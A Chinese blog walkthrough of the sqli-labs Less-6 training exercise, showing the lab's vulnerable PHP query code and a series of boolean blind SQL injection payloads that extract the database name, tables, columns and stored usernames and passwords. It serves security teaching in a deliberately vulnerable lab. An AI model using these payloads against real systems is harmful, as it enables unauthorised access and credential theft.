首页 > 其他分享 >第六关-Less-6:

第六关-Less-6:

时间:2024-02-02 22:55:41浏览次数:30  
标签:Less 第六 echo --+ table id select schema

第六关-Less-6:

GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

我们还是先来判断注入点:

我们输入一个正常的?id=1来查看一下回显:

页面还是和第五关一样,没有什么有用信息的回显

我们输入?id=1' 来查看一下:

发现也是没有任何回显,也可能没有闭合

我们再试一下?id=1" (双引号)看一下:

这里我们看到报错信息,发现是双引号闭合

查看一下它的关键的网页源码:

$id = '"'.$id.'"';     //双引号闭合
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3"  color= "#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

这里我们的思路就很清晰,和第五关一样,唯一的区别是一个是单引号一个是双引号

布尔型盲注的payload:

?id=1" and length((select database()))>9--+
#大于号可以换成小于号或者等于号,主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4

?id=1" and ascii(substr((select database()),1,1))=115--+
#substr("78909",1,1)=7 substr(a,b,c)a是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。

?id=1" and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+
判断所有表名字符长度。

?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+
逐一判断表名

?id=1" and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+
判断所有字段名的长度

?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+
逐一判断字段名。
 
?id=1" and length((select group_concat(username,password) from users))>109--+
判断字段内容长度
?id=1" and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
逐一检测内容。

还是时间延迟注入和报错注入就看第五关!

标签:Less,第六,echo,--+,table,id,select,schema
From: https://www.cnblogs.com/xyweiwen/p/18004159

相关文章

  • 第五关-Less-5:
    第五关-Less-5:GET-DoubleInjection-SingleQuotes-String(双注入GET单引号字符型注入)我们还是先来判断注入点:我们输入一个正常?id=1来查看一下回显:这里我们看到它的页面是不回显的我们再输入?id=1'来查看一下:发现还是存在语法错误,从报错信息这里我们看到是单引......
  • 第六十三天 cookie, session与Django中间件
    一、cookie与session简介"""HTTP协议四大特性1.基于请求响应2.基于TCP、IP作用于应用层之上协议 3.无状态服务端无法识别客户端的状态 1.互联网刚开始兴起的的时候所有人访问网址都是一样的数据 服务端无法识别客户端问题不大 2.互联网发展淘宝、京东、阿里 服务端......
  • CCSIP中国网络安全行业全景册(第六版)发布 飞驰云联入选7大领域
    2024年1月24日,FreeBuf咨询正式发布《CCSIP2023中国网络安全行业全景册(第六版)》。Ftrans飞驰云联的产品凭借优秀的市场表现,强势入选网络隔离/网闸、工业网络隔离系统/网闸、数据安全管控(平台型)、数据安全治理(解决方案)、恶意内容检测、容灾备份、邮件安全等7大细分领域。 本次......
  • 第四关-Less-4:
    第四关-Less-4:GET-Errorbased-DoubleQuotes-String(基于错误的GET双引号字符型注入)判断注入点:我们输入?id=1'时来查看页面的回显:发现页面并没有任何变化我们再输入?id=1"(双引号)来查看页面回显:这里根据报错,我们可以知道SQL语句是双引号字符型且有括号,所以我们......
  • 《PMBOK指南第六版》第5章 项目范围管理 ——> 收集需求
    第5章项目范围管理——>收集需求收集需求 是为实现目标而确定、记录并管理相关方的需要和需求的过程。本过程的主要作用是,为定义产品范围和项目范围奠定基础,且仅开展一次或仅在项目的预定义点开展。   ......
  • CF138A Literature Lesson
    原题传送门分析既然题目要求求出所有四行诗共同的形态,那我们就想到可以用位运算。我们用二的次方来表示每一种形态,然后把每一篇诗的形态或起来,就可以得到最终的形态。输出的时候再拿个函数转一下就行了。有了基本框架,我们就可以开始构造特殊情况。题目中说到如果有aaaa这种......
  • 第三关-Less-3
    第三关-Less-3:GET-Errorbased-Singlequoteswithtwiststring(基于错误的GET单引号变形字符型注入):判断注入点:当我们在输入?id=1'的时候看到页面报错信息。可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。这时我们来查看源码的关键部分......
  • 第二关-less-2:
    sqli-labs第二关:先判断是否存在sql注入漏洞页面回显返回错误,说明存在sql注入再判断它的注入点通过回显可知是数字型注入,然后现在将第一关的sql注入语句改为数字型,就可以注入成功//判断字段:?id=1orderby1--+?id=1orderby2--+?id=1orderby3--+?id=1ord......
  • Leetcode刷题第六天-回溯
    131:分割回文串链接:131.分割回文串-力扣(LeetCode)for遍历字符串递归切割,切割到字符串尾,单次结束1classSolution:2defpartition(self,s:str)->List[List[str]]:3if(nots):return[]4re=[]5self.backtracking(s,[],re,......
  • 《C++ Primer Plus》(第六版)中文版——思维导图+附录PDF+源代码
    说明,以下文件可在异步社区免费下载不同之处在于原附录PDF文件没有书签,而本文分享的附录文件带有书签本文所有文件下载链接:https://www.123pan.com/s/lO3uVv-uaEKv.html思维导图(图片)以下仅为预览,高清图片可从文章开头下载链接中下载另外后续本人有空会制作XMind脑图版本,会添加......